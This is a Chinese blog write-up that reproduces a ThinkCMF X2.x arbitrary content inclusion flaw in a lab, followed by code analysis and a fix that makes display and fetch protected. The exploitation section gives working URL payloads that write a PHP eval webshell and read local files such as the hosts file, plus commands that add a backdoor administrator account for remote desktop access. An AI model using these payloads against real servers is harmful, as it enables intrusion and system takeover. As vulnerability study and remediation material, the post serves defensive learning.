漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现

最新推荐文章于 2024-05-08 17:40:54 发布
最新推荐文章于 2024-05-08 17:40:54 发布
阅读量2.8k 收藏 5
点赞数 2
分类专栏: 漏洞复现 文章标签: 漏洞复现 ThinkCMF 文件包含 远程代码执行 一句话木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwl012345/article/details/102792586
版权

0x00 简介

ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。

0x01 漏洞介绍

攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

0x02 影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

0x03 环境搭建

本次使用的环境版本是ThinkCMF2.2.3版本,直接下载相关压缩包,解压之后放到phpstudy下面,然后访问该目录,按照ThinkCMF的安装向导进行安装。

1.下载ThinkCMF2.2.3版本
下载地址: https://github.com/thinkcmf/cmfx
在这里插入图片描述

2.解压放到phpstudy的www目录下
在这里插入图片描述

3.在浏览器中访问ThinkCMF
http://IP地址/文件夹名称
在这里插入图片描述

4.进行安装
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
安装完成。
到这里漏洞环境就搭建好了,接下来就可以进行漏洞测试了。

0x04 漏洞利用

  • 第一种方法:使用a参数的fetch方法,将想查看的内容写入到一个文件中,然后执行该文件,就可以查看到内容了。

(1):查看phpinfo()信息
构造payload:
?a=fetch&templateFile=public/index&prefix=’’&content=<php>file_put_contents(‘test.php’,’<?php phpinfo(); >’)</php>
在这里插入图片描述
执行之后页面是空白的,然后执行该文件。
在这里插入图片描述
执行之后查看到了php的相关的信息。

(2):上传一句话木马
构造payload:
?a=fetch&templateFile=public/index&prefix=’’&content=<php>file_put_contents(‘test1.php’,’<?php @eval($_POST[cmd]) >’)</php>
在这里插入图片描述
页面为空白,然后执行该文件
在这里插入图片描述
使用菜刀进行连接。
在这里插入图片描述
使用菜刀成功连接。

(3):使用菜刀虚拟终端新建用户打开远程桌面
新建用户并添加到管理员组
net user wwl 123 /add
net localgroup administrators wwl /add
在这里插入图片描述
在kali上执行以下命令
rdesktop -uwwl -p123 192.168.223.128
-u后面跟用户名
-p后面跟密码
在这里插入图片描述
这样就通过kali打开了目标主机的远程桌面。

  • 第二种方法:通过构造a参数的display方法,实现任意文件包含

(1):本地文件包含
构造payload
?a=display&templateFile=README.md
在这里插入图片描述
构造payload
?a=display&templateFile=Nginx.conf
在这里插入图片描述
构造payload
?a=display&templateFile=C:\WINDOWS\system32\drivers\etc\hosts
在这里插入图片描述

(2):远程文件包含
构造payload
?a=display&templateFile=http://192.168.223.160/1.txt
在这里插入图片描述
无法进行远程文件包含。

0x05 漏洞分析

进行代码审计
由于ThinkCMF是开源项目,下载相关的源码进行审计

(1):查看主页代码
在这里插入图片描述
发现了项目路径,去application里面查看。

(2):在application里面发现了IndexController.class.php
在这里插入图片描述
发现存在display,主页内容太少,查看其父类。

(3):查看父类HomebaseController.class.php
在这里插入图片描述
在这里插入图片描述
发现display和fetch是public,可以被任意引用。

拓展
public的访问权限是最松的,它可以在同一个包内访问,也可以在不同包内访问,它表示紧随其后的元素对任何人都是可用的
private字面的意思是私有,可见它的访问权限是比较严格的,它表示除类型创建者和类型的内部方法之外的任何人都不能访问的元素。它就像一堵墙,当有人试图访问它时,就会在编译时得到错误信息
protected字面的意思是受保护的,它与private关键字的作用相当,差别仅在于继承的类可以访问protected成员,但是不能访问private成员

0x06 漏洞成因

引起漏洞最主要的问题就是因为fetch函数和display函数是public类型

fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。
display函数的作用是加载模板和页面输出,所对应的参数为:templateFile模板文件地址,charset模板字符集,contentType输出类型,content输出内容。
fetch和display的用法差不多,二者的区别就是display方法直接输出模板文件渲染后的内容,而fetch方法是返回模板文件渲染后的内容。

0x07 修复方案

可以通过漏洞成因看出来,引起漏洞最主要的原因就是fetch和display函数是public,可以在外面被访问,因此修复方案就是将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected,使他们无法在外面被访问。

想走安全的小白
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 1606
【thinkcmf-文件包含】public函数
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_84264010的博客
05-08 980
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
ThinkCMF框架任意内容包含漏洞
qq_17754023的博客
02-28 2167
ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时是如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本 漏洞介绍 远程攻击者在无需任何权限情况下,通过构造特定的
记录 ThinkCMF 框架 X2.2.3 版本漏洞发现与解决
Peak Xin's Blog
03-24 691
接到网警通知,说网站有安全漏洞,根据网警提供的检测报告,经过各种尝试,终于复现了,现在记录这一激动人心的时刻。因为它的这两个方法是公用的,我们需要把它改为私用的,这样才可以不被前端的用户去任意的利用。,根据网警提供的检测报告在postman工具上操作复现漏洞情况。那找解决方法吧,升级框架肯定是不现实的,好歹是找了解决方案。网站是基于ThinkCMF框架搭建的,查看版本是。点击发送,看看结果,意不意外惊不惊喜!修复后,再次访问,解决了。
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1249
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1120
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
ThinkCMF 2.2.0漏洞
2301_79773660的博客
09-22 290
?>’)/shell.php?>’)
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2030
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
ThinkCMF框架上的任意内容包含漏洞复现+分析
weixin_44897902的博客
11-16 817
thinkcmf任意内容包含漏洞
ThinkCMF介绍和漏洞初探
soldi_er的博客
05-28 1427
##内容管理框架thinkcmf   ThinkCMF是基于ThinkPHP的内容管理框架。首次遇到,是第一次参加学校awd攻防赛。下载比赛中的Web源码,探索ThinkCMF内容管理框架。 信息 说明 概要 开源国产,中文建站系统CMS 开发语言 PHP Javascript,HTML/CSS 操作系统 跨平台 官网地址 https://www.thinkcmf.com/ 特点 支持Swoole 版本 截至2021年5月,最新版本:5.1.7 & 6.0.1
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1610
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMF。 thinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现
YouthBelief的博客
05-10 2395
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf 代码执行 CVE-2019-7580thinkcmf 代码执行 (CVE-2019-7580)0x01 漏洞描述0x02 影响范围0x03 漏洞复现3.1 登录后台3.2 漏洞利用3.2.1webshell3.2 phpinfo3.3 获取系统命令0x04 漏洞修复 thinkcmf 代码执行 (CVE-2019-7580) 复现小心会搞崩环境。 0x01 漏洞描述 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于Thi

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值